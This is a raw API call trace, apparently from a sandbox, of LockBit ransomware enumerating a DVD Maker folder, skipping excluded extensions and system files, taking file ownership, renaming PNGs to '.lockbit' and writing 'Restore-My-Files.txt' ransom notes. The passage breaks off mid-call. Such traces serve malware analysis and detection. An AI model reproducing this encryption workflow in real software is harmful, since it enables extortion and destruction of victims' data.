(lpString1="..", lpString2="..") returned 0 [0080.956] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6faf8c48, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6faf8c48, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0080.956] lstrcmpiW (lpString1=".", lpString2="1047x576black.png") returned -1 [0080.956] lstrcmpiW (lpString1="..", lpString2="1047x576black.png") returned -1 [0080.956] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0080.956] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.956] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.956] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.956] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.956] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.956] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.956] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.956] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.956] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.956] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.956] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.956] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.956] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.956] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.956] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.956] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.957] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.957] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.957] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.957] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.957] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.957] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.957] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.957] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.957] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.957] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.957] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.957] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.957] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.957] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.957] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.957] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.957] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.957] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.957] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.957] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.957] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.958] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.958] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.958] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.958] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.958] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.958] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.958] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.958] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.958] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.958] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.958] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="1047x576black.png") returned 1 [0080.958] lstrcmpiW (lpString1="ntldr", lpString2="1047x576black.png") returned 1 [0080.958] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="1047x576black.png") returned 1 [0080.958] lstrcmpiW (lpString1="bootsect.bak", lpString2="1047x576black.png") returned 1 [0080.958] lstrcmpiW (lpString1="autorun.inf", lpString2="1047x576black.png") returned 1 [0080.958] lstrcmpiW (lpString1="thumbs.db", lpString2="1047x576black.png") returned 1 [0080.958] lstrcmpiW (lpString1="iconcache.db", lpString2="1047x576black.png") returned 1 [0080.959] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\") returned="" [0080.959] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned=".png" [0080.959] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.959] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.959] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.959] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.960] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.960] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.960] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.960] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.960] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.960] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.960] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.960] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png.lockbit") returned 79 [0080.960] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.961] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.961] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.961] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.961] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.961] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.961] RtlFreeAnsiString (AnsiString="\\") [0080.962] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0080.962] malloc (_Size=0x200) returned 0x77d800 [0080.962] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.962] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.962] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.962] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.963] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.963] CloseHandle (hObject=0x3b4) returned 1 [0080.963] free (_Block=0x77d800) [0080.963] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0080.963] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.963] malloc (_Size=0x40068) returned 0x3df0008 [0080.963] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4570) returned 1 [0080.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0080.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0080.964] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0081.110] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.110] malloc (_Size=0xb4) returned 0x77d800 [0081.110] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0081.111] free (_Block=0x77d800) [0081.111] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 1 [0081.111] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt") returned 74 [0081.111] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.111] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.111] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.111] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.113] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb1eda5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fb1eda5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x0, dwReserved1=0x0, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0081.114] lstrcmpiW (lpString1=".", lpString2="15x15dot.png") returned -1 [0081.114] lstrcmpiW (lpString1="..", lpString2="15x15dot.png") returned -1 [0081.114] PathFindExtensionW (pszPath="15x15dot.png") returned=".png" [0081.114] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.114] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.114] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.115] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.115] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.115] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.115] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.115] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.115] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.115] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.115] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.115] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.115] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.115] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.115] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.115] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.115] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.115] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.115] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.115] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.115] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.115] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.115] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.115] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.115] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.116] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.116] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.116] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.116] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.116] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.116] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.116] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.116] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="15x15dot.png") returned 1 [0081.116] lstrcmpiW (lpString1="ntldr", lpString2="15x15dot.png") returned 1 [0081.116] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="15x15dot.png") returned 1 [0081.116] lstrcmpiW (lpString1="bootsect.bak", lpString2="15x15dot.png") returned 1 [0081.116] lstrcmpiW (lpString1="autorun.inf", lpString2="15x15dot.png") returned 1 [0081.116] lstrcmpiW (lpString1="thumbs.db", lpString2="15x15dot.png") returned 1 [0081.116] lstrcmpiW (lpString1="iconcache.db", lpString2="15x15dot.png") returned 1 [0081.116] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\") returned="" [0081.116] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned=".png" [0081.116] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.116] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.116] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.116] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.116] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.117] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.117] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.117] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.117] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.117] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.117] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.117] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.117] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.117] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png.lockbit") returned 74 [0081.118] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\15x15dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.119] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.119] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.119] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.119] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.120] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.120] RtlFreeAnsiString (AnsiString="\\") [0081.120] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0081.120] malloc (_Size=0x200) returned 0x77d800 [0081.120] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.120] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.120] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.120] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.121] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.121] CloseHandle (hObject=0x3c4) returned 1 [0081.121] free (_Block=0x77d800) [0081.121] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\15x15dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.121] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.121] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.121] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=2821) returned 1 [0081.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.122] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.122] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.122] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.122] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.132] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.132] malloc (_Size=0xaa) returned 0x77d800 [0081.132] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xaa, FileInformationClass=0xa) returned 0xc0000008 [0081.133] free (_Block=0x77d800) [0081.133] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 1 [0081.133] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt") returned 74 [0081.133] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.133] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fad2aeb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fad2aeb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d14a237, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x43e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="colorcycle.png", cAlternateFileName="")) returned 1 [0081.133] lstrcmpiW (lpString1=".", lpString2="colorcycle.png") returned -1 [0081.133] lstrcmpiW (lpString1="..", lpString2="colorcycle.png") returned -1 [0081.133] PathFindExtensionW (pszPath="colorcycle.png") returned=".png" [0081.133] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.133] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.133] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.133] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.133] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.133] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.133] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.133] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.133] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.133] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.133] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.133] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.133] lstrcmpiW 